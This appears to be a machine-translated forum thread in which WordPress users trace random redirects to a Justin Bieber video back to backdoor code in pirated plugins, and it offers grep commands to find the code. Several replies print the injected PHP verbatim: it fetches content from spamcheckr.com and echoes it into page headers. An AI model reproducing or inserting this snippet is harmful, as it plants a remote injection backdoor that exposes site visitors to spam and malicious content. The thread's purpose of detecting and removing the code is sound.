WordPress博客感染HTML刷新元标记

大家好，我的社区。我今天有一个非常有趣的（依我看）传染病要和大家分享

4-5天前，我意识到我的博客主页在加载几秒钟后被重定向到另一个页面。特别是在youtube上观看贾斯汀·比伯的视频。我认为这是我电脑的问题，所以我扫描了病毒和恶意软件。但这不是我的错

最后，我确信这不是本地问题，因为谷歌pagespeed insights也有同样的结果

所以，经过几个小时的研究（还有一些坏键盘），我发现了这些线索。详情如下：

在我的标题中创建了一个元标记，如下所示：

<meta http-equiv="refresh" content="0; url=http://www.youtube.com/watch?v=RFngSCaY5nA">

首先，我禁用了所有插件，但没有结果。过了一会儿，问题仍然存在。 其次，我搜索了我所有的数据库表，以确定视频的URL是否包含在某个地方，但它没有。 然后我在我的模板编辑器中一个接一个地搜索php文件，但什么都没有。 .htaccess也很清楚（不是100%确定我在那里寻找什么，但我认为没有可疑之处）

在所有这些之后，我通过FTP下载了我的整个网站，并在每个文件中搜索这个URL。我发现它包含在缓存文件夹的一些HTML文件中。我使用W3总缓存来实现这个目的。我删除了整个缓存文件夹，但过了一会儿问题仍然存在

有趣的是，这种“病毒”并不总是活跃的。它随机出现，每次出现在不同的页面上。也是在今晚，我意识到它出现在第二台计算机上，同时我的计算机上的一切看起来都很好

Youtube视频URL是：http://www.Youtube.com/watch？v=RFngSCaY5nA

所以我的问题是：在删除整个安装并从头开始之前，你们有没有人可以推荐一个解决方案？过去有没有其他人和我有同样的问题

我想这就是我要分享的一切。很抱歉，我的帖子太长了，尽量详细。我不擅长编码，这是我第一次尝试运行WordPress站点，所以，可能有些东西我忘记了

---

提前谢谢。

我也有同样的问题，我想我找到了解决办法！ 检查站点文件以获取此链接： 我在formcraft插件中找到了这个链接

像这样：

if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}}

编辑：

---

同时检查以下内容：

以上回答很好。此外，我建议搜索代码有困难的人使用grep：

grep -nr 'http://spamcheckr.com/l.php' /www/wordpress/wp-content

如果您没有grep且无法访问服务器（windows用户），请下载或使用findstr：

findstr /s /i /p "http://spamcheckr.com/l.php" /www/wordpress/wp-content

---

（别忘了将/www/wordpress/wp内容更改到您的位置或您的wordpress文件夹中

我在wordpress fooboxV2插件中找到了此脚本。（FooBox） 插件官方网址是

这是脚本文件路径 /wp content/plugins/fooboxV2/includes/dullic_class.php

你可以看到整个脚本都被注释了。但是我在注释的代码中找到了这段代码

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_hhesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_hhesk');}} ?>

---

如果您使用的是Gravity表单的空版本，您可能也会遇到此重定向问题。要解决此问题，请转到/plugins/gravityforms/settings/setting.php并删除以下代码：

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqc2_cahesk() {if(function_exists('curl_init')){$addressd = "http://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqc2_cahesk');}} ?>

---

祝你好运。

也找到了它。在我的例子中，我使用了一个明显为空的插件（我没有意识到）。它名为woocommerce checkout field editor，正在注入一个指向Justin Bieber youtube视频的链接

该函数如下所示，隐藏在\wp content\plugins\woocommerce checkout field editor\assets\js\class.php中：

if (mt_rand(0,99) == 1) {
function sec_check() {
    if(function_exists('curl_init'))    
    {
        $url = "spamcheckr.com/req.php";
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo "$data";
    }
}
add_action('wp_head','sec_check');

}

正如我们所看到的，它只在随机函数点击“1”时显示垃圾邮件。然后，它礼貌地询问是否安装了curl，然后向垃圾邮件服务器发送一个简单的GET请求，以查看应该注入什么代码

该网站是spamcheckr.com

然后，它将自己添加到WordPress标题中，并重定向页面的查看器

---

我向他们的主机报告了该站点，让我们看看会发生什么。

是的！我在同一个插件中发现了相同的代码。。我们必须小心更改插件的下载源。。我已经检查了我的站点好几次，甚至从远程桌面上检查过，一切似乎都正常。我会再检查几次，然后你会得到绿色的复选标记！谢谢你的回复！我删除了代码，也清除了缓存，但过了一会儿它又重新定向了。天哪，看起来它被击中了！我是FooBox的开发人员，文件/wp content/plugins/fooboxV2/includes/dullic_class.php不是官方FooBox插件的一部分。因此，您运行的FooBox版本似乎不是t他是fooplugins.com的官方插件，但实际上是一个修改版，有人在其中添加了一些垃圾邮件注入器代码。是的，我对此表示怀疑。因为我从非官方网站下载了这个插件，所有插件都是一样的，都注入了这个代码。实际上我认为它是由所有者添加的。感谢你告诉我这一点。我想你最好能提高这个插件的安全性，以防黑客攻击。再次感谢。